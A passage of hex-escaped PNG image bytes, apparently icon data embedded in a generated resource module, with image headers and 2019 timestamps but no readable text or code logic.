xdc\\x52\\xa9\\\n\\xfb\\xfe\\xdc\\x56\\xa1\\xad\\x75\\x2b\\xec\\x36\\x28\\x8b\\x27\\x83\\xd8\\xc7\\\n\\x04\\x8c\\x2f\\xe8\\x38\\x96\\xba\\x83\\xb7\\xdc\\xbc\\x28\\x98\\x7f\\xfe\\x2b\\\n\\x44\\x31\\xd7\\x1b\\x01\\x74\\xbd\\x3b\\x2a\\x73\\xf7\\xcc\\xd1\\x35\\xad\\x06\\\n\\xc7\\x59\\x48\\x24\\x1b\\x6e\\x7d\\x75\\x69\\x87\\xe1\\xc9\\x4d\\xe7\\xda\\x7c\\\n\\x7c\\xbf\\x06\\xf0\\x8d\\xe3\\xe3\\xa2\\xe4\\x4b\\xe9\\xd6\\x35\\xe5\\x81\\x4a\\\n\\x9b\\x44\\x1f\\x06\\xca\\x67\\x40\\xab\\x84\\xb6\\xd6\\x03\\xbe\\x97\\xce\\x57\\\n\\x5b\\x0d\\xe3\\xbe\\x6c\\xba\\xb4\\xb3\\xc3\\xdb\\x00\\xa4\\x0d\\xc2\\xae\\x15\\\n\\x25\\x00\\x98\\x07\\x51\\xac\\xba\\xbc\\x38\\xa2\\x9a\\xc4\\x38\\xb1\\xe5\\x6f\\\n\\x9b\\x6d\\x00\\xda\\x7a\\x8c\\x13\\x3d\\x0a\\x44\\x35\\x2c\\x41\\x88\\x3e\\xbe\\\n\\x55\\x5a\\xcb\\x4d\\x4b\\x45\\x72\\xa8\\x0d\\x5b\\xbc\\x0f\\x40\\x1a\\x21\\x74\\\n\\x56\\x58\\x34\\x80\\xb9\\x8e\\x1f\\x41\\xe6\\x09\\x1b\\x6a\\x40\\x74\\xa6\\x55\\\n\\xb4\\x0c\\x62\\x56\\x5a\\x2d\\x6b\\x80\\xed\\x85\\x4f\\x5a\\x80\\x27\\x01\\x00\\\n\\x35\\x6b\\xb6\\xe1\\xfe\\x82\\xf5\\xd2\\xdd\\x89\\xe3\\x04\\x88\\xa2\\x33\\x25\\\n\\x21\\x95\\x00\\xba\\x3b\\x26\\x94\\x53\\xdd\\x16\\xb6\\xe1\\x7d\\xee\\x9a\\x18\\\n\\x74\\xb1\\xb9\\xb9\\x3b\\x4e\\x54\\x0b\\x80\\x3d\\x73\\xc1\\x44\\x46\\x46\\xa2\\\n\\xf2\\xe9\\xf5\\xd2\\xd5\\xa3\\x3d\\x63\\x3c\\x8d\\x19\\x01\\x54\\x01\\xa1\\x22\\\n\\x13\\x36\\x34\\xdb\\xdc\\x5c\\x05\\x51\\xad\\x00\\x3a\\x95\\x90\\x90\\x80\\x92\\\n\\x47\\x9f\\x93\\xec\\x43\\x06\\xfa\\x32\\x02\\xa8\\x0e\\x42\\x6f\\x06\\xb1\\x97\\\n\\xcd\\x6d\\x20\\x10\\xd5\\x0e\\xa0\\x53\\xc9\\xc9\\xc9\\x78\\x65\\xda\\xe3\\x52\\\n\\x8d\\xff\\x68\\xc9\\x08\\x20\\x19\\x84\\x52\\xbb\\x66\\x18\\x88\\x6e\\x94\\xbd\\\n\\x3f\\x10\\x3d\\x05\\x40\\xa7\\x32\\x33\\x33\\x91\\x15\\xf4\\x80\\x1a\\x27\\x60\\\n\\x38\\x1f\\xce\\x3d\\xae\\x5c\\xff\\x65\\x8e\\xb3\\x01\\x9d\\xae\\x19\\x06\\x22\\\n\\x45\\x20\\x0a\\x36\\xab\\x47\\xe6\\x03\\x2d\\x2c\\x2c\\x44\\xb2\\x18\\xa4\\x2a\\\n\\x00\\xdb\\x6d\\xb6\\x90\\xd1\\x5a\\x9f\\x90\\xf7\\x1e\\x9e\\xca\\x4b\\x0e\\x21\\\n\\x61\\xd7\\x8c\\x1a\\x40\\x34\\x2b\\xf4\\xf1\\xe9\\x17\\xc4\\x80\\xe6\\x73\\x7e\\\n\\x9e\\x7c\\x2c\\x75\\x49\\x49\\x09\\x96\\x5c\\xd1\\xab\\x01\\x40\\xfb\\x07\\x91\\\n\\xe3\\x3a\\xb4\\x3c\\xdf\\xa1\\xe3\\x5d\\x8f\\x6f\\x83\\xe9\\x8e\\x5a\\x68\\x69\\\n\\x8c\\x32\\x82\\xb8\\x15\\xf6\\xe4\\x42\\x54\\xb9\\x6b\\x38\\x51\\xf4\\x6f\\xbd\\\n\\x6b\\x42\\x8c\\xc8\\xf3\\x34\\x01\\x68\\x43\\x8f\\x6c\\x68\\x43\\xcd\\x88\\x5d\\\n\\x51\\x51\\x81\\x05\\x3f\\x08\\xd4\\x03\
\x08\\xa0\\x43\\x27\\xf0\\x5f\\xfd\\x32\\\n\\x40\\x7b\\xfe\\xe1\\xc3\\xa7\\x5c\\x0e\\x54\\xee\\xad\\x13\\x72\\x9c\\x0d\\xa2\\\n\\x48\\xc2\\xc8\\x3d\\xd8\\xc6\\x08\\x80\\xbc\\xf1\\x5b\\x9b\\x66\\x3a\\xd2\\x01\\\n\\x1c\\x13\\xed\\xbd\\x00\\x2b\\xe8\\x58\\x4b\\x14\\x44\\x8e\\x3b\\x2e\\x0a\\x3e\\\n\\x73\\x00\\xf9\\x76\\x81\\x0f\\x14\\xfd\\x38\\xd1\\x56\\x0b\\x11\\x55\\x22\\xcf\\\n\\x7f\\xcc\\x03\\xd5\\x52\\xa5\\xa4\\xd7\\x6a\\xb5\\x00\\x5a\\x69\\x06\\xd0\\x02\\\n\\xa0\\x9a\\x03\\x6a\\xf4\\x3e\\x82\\x5b\\xce\\x1f\\x97\\xcf\\xac\\xef\\xd2\\xe0\\\n\\x75\\xb8\\x35\\xf5\\xab\\xa3\\xa5\\xcb\\x03\\x80\\x98\\xcd\\xad\\xf3\\x8b\\x45\\\n\\x57\\x1e\\x16\\xa7\\x97\\x97\\x07\\x1d\\xb3\\x7f\\x16\\x00\\x95\\xbc\\xb5\\x23\\\n\\x5f\\x77\\xf5\\xbb\\xea\\x8e\\x3b\\x82\\x6e\\x9a\\xb7\\xc7\\x49\\xf2\\x2e\\x8c\\\n\\x46\\x23\\xf6\\x07\\x52\\x0f\\x60\\xe7\\xd0\\xc5\\xdd\\x80\\xe0\\xbe\\x63\\x86\\\n\\xe3\\x2c\\x10\\xc5\\x2a\\xd8\\xdd\\x2c\\x4a\\x17\\x5e\\x36\\x9b\\x9b\\x33\\x2a\\\n\\x52\\xe4\\xae\\x11\\x40\\xcf\\xd4\\xfb\\xad\\xc3\\x53\\x39\\xae\\xf2\\xe7\\x3f\\\n\\x3f\\x27\\x59\\xfd\\x27\\x25\\x25\\x79\\x34\\x80\\x83\\x8a\\x84\\x8e\\x68\\x48\\\n\\x9b\\x17\\xcf\\x39\\x56\\xad\\x86\\x0c\\x27\\x08\\x53\\x9c\\x99\\x4c\\xb5\\x13\\\n\\x30\\x7d\\x29\\x25\\x25\\x05\\x59\\xcd\\xff\\xe8\\xfc\\xef\\x86\\x6b\\x66\\x7e\\\n\\xbc\\xbf\\xaf\\x46\\x2f\\xf0\\x0f\\x7a\\x0a\\x80\\x83\\x99\\x98\\x01\\x00\\x38\\\n\\x6e\\xd6\\x79\\x73\\x28\\x3f\\x85\\xef\\xcd\\x36\\x37\\x8f\\x04\\x30\\x27\\x27\\\n\\xa7\\x1b\\x80\\x57\\x2d\\x56\\x1f\\x5f\\x88\\x93\\x2c\\x36\\x91\\x96\\x8c\\x00\\\n\\x92\\x00\\x38\\xe8\\x48\\x48\\x71\\x44\\x94\\xb4\\x72\\x58\\x44\\x54\\x06\\xc0\\\n\\xa2\\xa2\\x22\\x24\\x7e\\xf0\\x5a\\xb7\\xee\\xa7\\x08\\x44\\x9b\\xad\\xb6\\x65\\\n\\x3c\\x87\\x28\\x2d\\xcf\\x2b\\x9d\\x11\\x40\\xd2\\x36\\x36\\x24\\x08\\x19\\x88\\\n\\x5e\\x0b\\x22\\x31\\x00\\x4b\\x4b\\x4b\\x11\\xf3\\xd6\\xb6\\xdb\\x8d\\xff\\x94\\\n\\x4e\\x49\\x42\\xa4\\x6d\\x0d\\xd9\\x3b\\x4a\\x61\\xd7\\xb4\\xd7\\xc0\\x9d\\x75\\\n\\x4d\\xd5\\x01\\xa0\\xc9\\x64\\xea\\x0f\\xc0\\x18\\x28\\x9f\\x11\\x80\\xc8\\xc7\\\n\\x7d\\xc8\\x91\\x90\\x45\\x44\\xaf\\x8a\\x88\\xc4\\x00\\xac\\xab\\xab\\xc3\\xb8\\\n\\x2d\\xab\\xfa\\x03\\x50\\xe3\\xa9\\x6d\\x49\\x32\\x08\\x19\\x88\\x1e\\x0d\\xa2\\\n\\x0d\\xf6\\x64\\x4c\\xd5\\x24\\x00\\x6c\\x6a\\x6a\\x82\\x7e\\xcd\\x12\\xaf\\x04\\\n\\x50\\x72\\x08\\xfb\\x00\\x31\\xca\\x51\\x81\\x02\\x03\\x51\\xbd\\xd1\\x8f\\x94\\\n\\x0b\\x06\\x00\\x5a\\x5a\\x5a\\xc0\\xff\\x61\\x3e\\xad\\x00\\x76\\xfb\\xf8\\x90\\\n\\x6a\\x3b\\x92\\x43\\xd8\\x05\\xc4\\x28\\x00\\x0f\\x3a\\xfe\\x19\\x45\\xd3\\xd7\\\n\\xac\\xd5\\x6a\\xab\\x3a\\x7f\\xa3\\xdd\\xf2\\x60\\x45\\xbd\\x4d\\x06\\x10\\x69\\\n\\xf9\\x10\\x0d\\xba\\xce\\x48\\xb8\\x60\\x00\\xa0\\xb5\\xb5\\x15\\xe6\\x67\\x8d\\\n\\xb4\\x02\\x68\\xb1\\x89\\xa8\\x15\\x21\\x56\\x09\\x1c\\xf7\\x31\\x00\\x62\\x26\\\n\\x10\\x22\\x10\\x02\\xc0\\xe5\\x25\\x73\\x69\\xcc\\xef\\x61\\x01\\x50\\xf5\\x93\\\n\\xc5\\x7a\\xe0\\x5f\\x37\\xdb\\xab\\xef\\xf4\\xf3\\xfd\\x72\\xfc\\xc1\\x13\\x1d\\\n\\x04\\x41\\xa4\\xed\\x43\\x34\\xa8\\x8f\\x96\\x60\\xb3\\x56\\x5a\\xf2\\x62\\x25\\\n\\x6d\\x80\\x66\\xb3\\x19\\xd3\\xa6\\x4d\\x43\\xed\\x94\\x91\\x54\\x02\\x08\\xa0\\\n\\xd2\\x62\\x13\\xf3\\xff\\xbb\\xb5\\xad\\x3a\\x44\\xaf\\xbb\\x79\\x77\\x69\\x2d\\\n\\x31\\x3b\\x24\\x31\\x08\\x29\\x1e\\x27\\x76\\xb4\\xd9\\x6c\\xdf\\xd9\\x44\\x54\\\n\\xeb\\x04\\x7e\\x2f\\x07\\x1c\\x21\\xf5\\x85\\xd3\\xa6\\x99\\x84\\x0e\\xfb\\x1a\\\n\\x17\\xd5\\x89\\x86\\xe4\\x9c\\x80\\x71\\xaa\\x87\\x1f\\x94\\x4a\\x1b\\x9a\\x55\\\n\\x44\\xe5\\xe8\\x92\\x5a\\xe2\\xb3\\xdd\\xc4\\x21\\xa4\\x14\\x44\\x
11\\xb7\\xce\\\n\\x3f\\x67\\xe3\\x44\\x99\\x01\\x5c\\xb0\\x60\\x01\\x5e\\xf7\\xbd\\xe4\\xb1\\x36\\\n\\x34\\x77\\x25\\x4b\\x8e\\x19\\x0a\\xd7\\x12\\xbd\\xf9\\x88\\x36\\x45\\x01\\x4c\\\n\\x49\\x49\\xc1\\xeb\\xbe\\x97\\x3c\\xda\\x86\\x46\\x65\\x24\\xa4\\x38\\x22\\xca\\\n\\x5a\\xf9\\x94\\x47\\x44\\xe2\\x00\\x66\\x67\\x67\\x63\\xd5\\xe9\\xf7\\x00\\x0f\\\n\\xb7\\xa1\\x51\\x0d\\x21\\x03\\x91\\x5a\\x10\\x89\\x03\\x58\\x50\\x50\\x80\\x67\\\n\\x6b\\xde\\xee\\x39\\xfe\\xf3\\x48\\x1b\\x1a\\x95\\xdd\\x51\\xca\\xbb\\xa6\\xbd\\\n\\x26\\x06\\xbc\\xac\\x6b\\x4a\\x1c\\xc0\\xe2\\xe2\\xe2\\xbe\\x00\\x8c\\x81\\x87\\\n\\xda\\xd0\\xa8\\x87\\x90\\x81\\x48\\x15\\x88\\xc4\\x01\\x34\\x99\\x4c\\x88\\x3f\\\n\\xb8\\xab\\x2f\\x00\\x3d\\xda\\x05\\xe3\\x56\\xef\\x48\\xa9\\x1b\\x8f\\x3c\\x50\\\n\\x6b\\xb9\\xbc\\x38\\xa2\\xb2\\xcb\\x1f\\xd1\\xf0\\x62\\x64\\xc9\\x5d\\x73\\xed\\\n\\xda\\x35\\xd8\\x00\\x8b\\xe3\\xd0\\x17\\x25\\xca\\xdf\\x6d\\x13\\x34\\x29\\x00\\\n\\x6b\\x6b\\x6b\\x31\\xe3\\xd5\\x0c\\x06\\x20\\x8d\\x91\\xd0\\x9b\\x23\\xa2\\xd9\\\n\\x6c\\x46\\x58\\x58\\x18\\x00\\x74\\x82\\x28\\x73\\xf9\\x9d\\x4b\\x33\\x2f\\x03\\\n\\xd8\\x4a\\x0a\\xc0\\xc6\\xc6\\x46\\x4c\\xdc\\xfe\\x12\\x6d\\x00\\x76\\x3b\\x90\\\n\\x94\\x06\\x00\\x15\\x99\\x98\\x71\\x61\\xb2\\x26\\xca\\x31\\x56\\x50\\x3a\\x45\\\n\\x3f\\x91\\xaf\\xe5\\xac\\x59\\xb3\\x50\\xf7\\xf0\\xcb\\x3d\\xbf\\x84\\x72\\x4d\\\n\\xd6\\xdc\\xca\\x05\\xe3\\x38\\xf1\\xa9\\x2d\\xd7\\x28\\xb9\\x13\\xa4\\xb9\\xb9\\\n\\x19\\xba\\x94\\x44\\xda\\x00\\x94\\xcd\\xa4\\xa1\\x4a\\x08\\xbb\\x80\\x18\\x65\\\n\\x15\\xc5\\x87\\x38\\x70\\x0f\\xf2\\x1c\\x22\\x3c\\xad\\xdb\\x12\\x17\\x17\\x87\\\n\\x8a\\xa9\\xeb\\x6f\\xd7\\x25\\x21\\x0d\\x22\\xf1\\xf1\\x1f\\x00\\x5c\\xb9\\x72\\\n\\x05\\x62\\xf2\\xe3\\xb4\\x01\\x28\\x9b\\x5d\\x51\\xd5\\x10\\x02\\xc0\\x0f\\x09\\\n\\x11\\xc2\\xc5\\x56\\xb3\\xdf\\x2f\\xf5\\xda\\x28\\x0d\\xcf\\xad\\xa5\\x70\\xfc\\\n\\x30\\xe8\\xb4\\x8a\\x2b\\x57\\xae\\xc4\\x6b\\x23\\x7f\\x37\\xd0\\xd8\\x80\\x14\\\n\\x88\\xb2\\x00\\x68\\x36\\x9b\\x11\\x1a\\x1a\\x8a\\x53\\xb3\\x7f\\x41\\xa5\\x0d\\\n\\x8d\\xb4\\x71\\xdf\\x23\\x20\\x74\\xea\\x52\\x62\\x84\\x46\\xe0\\xa8\\x1b\\xc8\\\n\\x57\\x3b\\x7e\\xaa\\xe0\\xa6\\xa3\\x3e\\x35\\x35\\x15\\x3b\\xf8\\xc7\\x5c\\x1d\\\n\\xa4\\x4b\\x0d\\xa2\\x2c\\x00\\x5a\\xad\\x56\\x1c\\x7d\\x6c\\x16\\xb3\\xa1\\x79\\\n\\x0a\\x84\\x7d\\x8c\\x13\\x69\\x00\\x71\\x50\\x69\\x15\\x73\\x73\\x73\\x91\\xde\\\n\\x32\\xd3\\xad\\x1b\\x49\\x08\\xa2\\x2c\\x00\\x02\\xc0\\xf9\\x85\\xb3\\x7d\\x7e\\\n\\xbc\\xd9\\x3e\\xf1\\x2e\\x3f\\xdf\\xa8\\x11\\x1a\\x61\\x31\\xec\\xbb\\x47\\x18\\\n\\x80\\x6a\\x86\\x90\\x52\\x10\\xdd\\x7a\\xb9\\xc5\\xc5\\xc5\\x58\\x76\\x36\\x68\\\n\\x50\\x37\\xe9\\x01\\xe2\\x60\\x9c\\x25\\xb2\\x01\\x78\\x79\\x71\\x04\\xb3\\xa1\\\n\\x79\\x2a\\x84\\x6a\\x06\\xb1\\xbc\\xbc\\x1c\\xf3\\x8f\\x0c\\xed\\x94\\x00\\x1e\\\n\\xd0\\xd8\\x44\\x31\\x5a\\x68\\xbb\\xb1\\x4c\\x14\\x84\\x28\\x9b\\xc6\\xcf\\xd5\\\n\\xc6\\x2d\\x2b\\x80\\x60\\x36\\x34\\xcf\\x86\\x50\\x8d\\x20\\xd6\\xd4\\xd4\\xe0\\\n\\xc1\\xb2\\x36\\x49\\x6e\\xa2\\xbb\\x7e\\xc9\\x47\\x68\\xb9\\x30\\xb1\\x7d\\xf4\\\n\\xf8\\x28\\x4b\\xc0\\x28\\x57\\xba\\x79\\x4a\\x01\\x48\\xcb\\xd8\\x5d\\x55\\x00\\\n\\x3a\\x3e\\xb6\\xf4\\x4b\\x4d\\x8b\\xfa\\x0d\\x0d\\x0d\\x92\\x01\\x08\\x00\\xe6\\\n\\x61\\xa3\\x3b\\xb4\\x96\\x9b\\xe7\\x44\\x1f\\xdf\\x3d\\xb0\\x2f\\xb0\\xf7\\x57\\\n\\x7e\\x06\\xa0\\xca\\x00\\x54\\x4d\\x24\\x54\\x53\\x44\\x34\\x8c\\xcf\\x21\\xf6\\\n\\xf2\\xfb\\x99\\xb0\\x21\\x9a\\x0d\\x8d\\x01\\x48\\x56\\x3e\\x6a\\x7a\\x58\\x35\\\n\\xf8\\x4d\\x5b\\xce\\x67\\x10\\x03\\xf1\\x36\\x7e\\x53\\x90\\xcc\\x86\\x46\\x39\\\n\\x80\\xb2\
\x1e\\x04\\xc4\\x20\\xbc\\x3d\\x88\\x34\\x64\\x33\\x53\\x0a\\x44\\x1b\\\n\\x00\\x70\\x36\\xdb\\x4e\\x12\\xd9\\xd0\\x28\\x07\\x70\\x48\\x6b\\xb7\\xac\\x3b\\\n\\x2a\\x5d\\x83\\xa0\\x36\\xad\\xa2\\x4c\\x5d\\xd3\\x79\\x00\\x20\\xd8\\xac\\x47\\\n\\x17\\xfc\\xf3\\x4f\\x96\\x92\\x92\\x12\\x78\\x11\\x80\\xce\\x7a\\x26\\x7e\\x38\\\n\\x2c\\x83\\xb0\\xbf\\x86\\x41\\x6f\\x5a\\x45\\x59\\x40\\xf4\\x71\\x44\\xff\\xa8\\\n\\x4f\\xb7\\x58\\x4d\\x26\\x93\\x37\\x02\\x58\\xa9\\xd6\\xe8\\xe7\\x31\\x10\\xaa\\\n\\x64\\xa2\\xa0\\x1a\\x1c\\x67\\x31\\xfc\\x2a\\x9b\\xc8\\x97\\x3a\\xec\\xd0\\x5a\\\n\\xd4\\xd7\\xd7\\x43\\x10\\xc8\\xf4\\xc6\\x29\\xb3\\x10\\x7a\\x1c\\x80\\x1e\\x03\\\n\\x21\\xc5\\x20\\x76\\x1b\\xb3\\x48\\x1d\\x15\\x83\\xf7\\xad\\x40\\x63\\x63\\x23\\\n\\x74\\x3a\\x9d\\xe4\\x0f\\x4f\\xa1\\x99\\xde\\x23\\x01\\xf4\\x28\\x08\\x29\\x05\\\n\\xb1\\xd7\\xec\\x9d\\x94\\x20\\xfe\\x98\\x36\\x0d\\x06\\x83\\x81\\xd8\\x78\\x9b\\\n\\xa2\\x6d\\x65\\x1e\\x0b\\xa0\\xc7\\x41\\x48\\x29\\x88\\x44\\xc6\\x89\\x17\\x53\\\n\\x26\\x22\\x38\\x38\\x98\\x74\\xfd\\xd1\\xb0\\xc1\\xda\\xa3\\x01\\x04\\x54\\xe2\\\n\\x98\\x71\\x47\\x6a\\x70\\xd7\\xb4\\x9c\\xcf\\x18\\xd2\\x87\\xe1\\xcc\\xb3\\x77\\\n\\xc9\\x01\\x60\\x0c\\x00\\x1d\\x03\\x90\\x41\\xc8\\x40\\xec\\xa1\\x93\\x4b\\x03\\\n\\x3b\\x73\\xd4\\x78\\xc1\\x98\\xda\\xe3\\x01\\xf4\\x58\\x08\\x3d\\x15\\xc4\\x77\\\n\\xa3\\xcd\\x08\\x0f\\x0f\\x67\\x00\\x32\\x08\\x19\\x88\\x4a\\x80\\xb8\\x77\\x4a\\\n\\x33\\xe2\\xe3\\xe3\\x3d\\x1d\\x40\\x2b\\x00\\xb3\\x37\\x01\\x08\\x78\\xe0\\xc4\\\n\\x8c\\x4a\\x26\\x1b\\x7a\\x7d\\xed\\xfb\\x9b\\xac\\xd9\\x11\\x74\\x16\\x6b\\xd6\\\n\\xac\\xf1\\x74\\x00\\x3d\\xc6\\x86\\xc6\\x20\\xec\\xbf\\xc1\\x51\\x9d\\xcd\\xad\\\n\\x2f\\x10\\x5f\\xb2\\xbd\\x8f\\xbc\\xbc\\x3c\\x6f\\x00\\xd0\\x59\\x0f\\xaa\\xb7\\\n\\xa1\\x31\\x08\\xfb\\x91\\x0a\\xb2\\xb9\\x75\\x03\\xf1\\xb9\\xcb\\x7f\\xc1\\xee\\\n\\xdd\\xbb\\xbd\\x09\\xc0\\x4a\\x6f\\x89\\x7e\\x5e\\x0b\\xa1\\x53\\x94\\x66\\x73\\\n\\xeb\\x16\\x09\\x96\\xb7\\x19\\xac\\x65\\x65\\x65\\xd2\\xc2\\x47\\x9f\\xd7\\xd6\\\n\\xeb\\x01\\xf4\\x5a\\x08\\x29\\x8c\\x06\\xc4\\xc7\\x44\\x14\\xee\\x3a\\x61\\x00\\\n\\x7a\\x3b\\x84\\x94\\x82\\x48\\x64\\x93\\x6a\\x1f\\x13\\x53\\x4a\\xef\\xbf\\x64\\\n\\x00\\x32\\x08\\xa9\\x06\\x51\\xd2\\x46\\xca\\xd6\\x00\\xe9\\x17\\xef\\xed\\x15\\\n\\xe0\\xc9\\x27\\x43\\x31\\x00\\x19\\x84\\xaa\\x50\\x51\\x51\\x11\\x1c\\x33\\x92\\\n\\x1e\\x05\\x22\\x03\\x90\\x75\\x47\\x55\\xa1\\xd2\\xd2\\x52\\x2c\\x3e\\x3e\\xa2\\\n\\xf3\\xbf\\x1d\\xee\\x15\\xd5\\x77\\x4d\\x29\\x03\\xb0\\x5b\\x26\\x38\\x06\\x20\\\n\\x83\\xb0\\x53\\x26\\x93\\x09\\x8f\\x7c\\xd0\\xfb\\xcf\\xd5\\x0e\\x22\\x6d\\x6b\\\n\\x80\\x36\\x11\\xb5\\x22\\xc4\\x2a\\x81\\xe3\\x3e\\x86\\x17\\xb9\\x60\\x18\\x84\\\n\\x03\\xa8\\xae\\xae\\x0e\\xb3\\xf6\\x5d\\xb9\\xed\\xff\\xef\\x01\\x22\\x0d\\xb3\\\n\\x89\\x2e\\x81\\x48\\xe3\\x22\\xbc\\xc5\\x26\\xe6\\xff\\x77\\x6b\\x5b\\x75\\x88\\\n\\x5e\\x77\\xf3\\xee\\xd2\\x5a\\x2b\\x43\\x8e\\x41\\x88\\xa6\\xa6\\x26\\x84\\x14\\\n\\x7e\\x39\\xe0\\xef\\x39\\x40\\xa4\\x3a\\x9b\\x5b\\x57\\x10\\x69\\x75\\xc1\\x58\\\n\\x45\\x54\\x9e\\x79\\x31\\xc7\\x62\\x34\\x1a\\x19\\x6d\\x0c\\x42\\xfb\\x31\\xce\\\n\\xc1\\x05\\xe7\\x5c\\xfe\\xfd\\x96\\x7f\\x66\\x52\\x9f\\xcd\\xcd\\x91\\x87\\x95\\\n\\x5a\\x1b\\x5a\\xc5\\xe2\\xd5\\x96\\xa5\\x4b\\x97\\x32\\xd2\\x18\\x84\\x40\\x6b\\\n\\x6b\\x2b\\x02\\xb2\\x6a\\x07\\xf5\\x77\\x29\\x1c\\x27\\x76\\x6d\\xe8\\x47\\x61\\\n\\xcf\\x3f\\x4a\\x1d\\x80\\x7b\\x22\\x16\\x5b\\xd6\\xad\\x5b\\xc7\\x28\\x63\\x10\\\n\\xda\\x4f\\x91\\xbd\\xff\\xfe\\xfb\\xf1\\xd5\\xc2\\x5d\\x83\\xbe\\x06\\xa5\\x20\\\n\\x56\\x03\\x38\\x0e\\x60\\x0e\\x28\\x
[binary payload omitted: hex-escaped PNG image bytes (PNG signatures "\x89PNG\r\n\x1a\n" with IHDR/IDAT/IEND chunks and tEXt creation/modification dates of 2019-01-28, apparently 128x128 icons embedded in a generated resource module); no recoverable text or code logic in this span]
\\x09\\x82\\xd2\\x2d\\x92\\xdc\\x14\\x18\\x09\\x61\\x66\\x33\\xbd\\x04\\\n\\xbf\\xd2\\xe2\\x88\\x08\\x31\\x6e\\xa5\\x9b\\x65\\xeb\\x58\\x02\\xa8\\x22\\xb2\\\n\\xa6\\x65\\xff\\x33\\x6b\\xda\\xd1\\xa3\\xf4\\x2e\\x21\\x78\\xcf\\x9e\\xad\\x74\\\n\\x7b\\x24\\x57\\x1f\\xbe\\xa3\\xad\\xd1\\xd1\\xfa\\xbe\\xa6\\xaf\\x4c\\x5f\\x1d\\\n\\x3f\\xae\\x74\\x73\\x18\\x0b\\xf9\\xb6\\x7b\\x66\\x2a\\xe4\\xde\\xe6\\x07\\x17\\\n\\xee\\xef\\x3f\\x7e\\xbc\\xc1\\x95\\xfa\\xcf\\xeb\\xe7\\xda\\xdb\\x63\\x1a\\xb4\\\n\\x82\\x3d\\x6f\\xbf\\x0d\\xf7\\xe0\\x01\\xdc\\x97\\x60\\x9e\\x80\\xb5\\x88\\xe3\\\n\\xfc\\x5d\\x61\\x10\\x0d\\xf8\\xec\\x33\\xdd\\x2c\\xe3\\x76\\xe3\\xf6\\x98\\x18\\\n\\xa5\\x9b\\xc5\\xfc\\xa7\\xea\\xf3\\x81\\xb2\\x51\\x1e\\xa9\\x6e\\xc7\\x34\\x87\\\n\\x06\\x0f\\x86\\x1c\\x6e\\x3c\\x2c\\x59\\xb6\\x0c\\x16\\xc1\\x13\\xb8\\xea\\xe2\\\n\\xa2\\x74\\xbb\\x5e\\x84\\x16\\xc1\\xeb\\xd0\\x2f\\x27\\x87\\x7a\\x51\\xac\\x30\\\n\\x2d\\x3c\\x3c\\xab\\x91\\xa9\\xa5\\xa9\\xe5\\xce\\x9d\\x4a\\xb7\\x8b\\xf9\\xef\\\n\\xd8\\x25\\x40\\x15\\xa7\\x0b\\xc8\\xee\\x62\\xe8\\xbe\\x7d\\x7b\\xdd\\xfc\\x02\\\n\\xd7\\x67\\xe4\\xe5\\x05\\x59\\xf4\\x77\\x48\\x89\\x8a\\x82\\xd6\\x30\\x91\\x26\\\n\\x9c\\x3d\\x5b\\xfa\\x4d\\x6b\\x6d\\x62\\xbd\\x62\\x3b\\x5a\\xd3\\x09\\x2c\\x9c\\\n\\x39\\xf3\\xd9\\xc3\\xc2\\xc0\\xe7\\x3e\\x5e\\x5e\\xec\\xc0\\xaf\\x1e\\xd8\\x19\\\n\\x40\\x35\\xe7\\x19\\xef\\x19\\xef\\x19\\xdf\\xb8\\x31\\x6e\\x2f\\x56\\x15\\xab\\\n\\xb4\\x5a\\x61\\x12\\x5c\\x84\\x8b\\x4d\\x9b\\xe2\\x27\\xc2\\x0f\\xb8\\xcf\\xc1\\\n\\x41\\xaa\\x7a\\xe8\\x53\\xae\\x2f\\xf9\\x17\\x16\\x72\\xab\\xe1\\x35\\x78\\x2d\\\n\\x37\\x97\\x06\\xdb\\x99\\xed\\xcc\\x7a\\x7d\\x66\\x78\\x66\\x78\\x66\\xf8\\x9d\\\n\\x3b\\x4a\\xf7\\x03\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\\n\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\xc3\\\n\\x30\\x8c\\xed\\xf9\\x7f\\x46\\xdc\\x29\\xa5\\xaf\\x47\\x67\\x30\\x00\\x00\\x00\\\n\\x25\\x74\\x45\\x58\\x74\\x64\\x61\\x74\\x65\\x3a\\x63\\x72\\x65\\x61\\x74\\x65\\\n\\x00\\x32\\x30\\x31\\x39\\x2d\\x30\\x31\\x2d\\x32\\x38\\x54\\x31\\x30\\x3a\\x31\\\n\\x36\\x3a\\x33\\x38\\x2b\\x30\\x33\\x3a\\x30\\x30\\x5a\\x95\\x3a\\x44\\x00\\x00\\\n\\x00\\x25\\x74\\x45\\x58\\x74\\x64\\x61\\x74\\x65\\x3a\\x6d\\x6f\\x64\\x69\\x66\\\n\\x79\\x00\\x32\\x30\\x31\\x39\\x2d\\x30\\x31\\x2d\\x32\\x38\\x54\\x31\\x30\\x3a\\\n\\x31\\x36\\x3a\\x34\\x31\\x2b\\x30\\x33\\x3a\\x30\\x30\\xb4\\x95\\xce\\x32\\x00\\\n\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x0d\\xc0\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x80\\x00\\x00\\x00\\x80\\x10\\x06\\x00\\x00\\x00\\x93\\xae\\xbd\\x88\\\n\\x00\\x00\\x00\\x04\\x67\\x41\\x4d\\x41\\x00\\x00\\xb1\\x8f\\x0b\\xfc\\x61\\x05\\\n\\x00\\x00\\x00\\x20\\x63\\x48\\x52\\x4d\\x00\\x00\\x7a\\x26\\x00\\x00\\x80\\x84\\\n\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00\\x75\\x30\\x00\\x00\\xea\\x60\\\n\\x00\\x00\\x3a\\x98\\x00\\x00\\x17\\x70\\x9c\\xba\\x51\\x3c\\x00\\x00\\x00\\x06\\\n\\x62\\x4b\\x47\\x44\\x00\\x00\\x00\\x00\\x00\\x00\\xf9\\x43\\xbb\\x7f\\x00\\x00\\\n\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x01\\x80\\x00\\x00\\x01\\x80\\x00\\x1f\\\n\\xe4\\xcb\\x22\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\xe3\\x01\\x1c\\x0d\\\n\\x10\\x29\\x7b\\x03\\x1b\\x75\\x00\\x00\\x0c\\xaf\\x49\\x4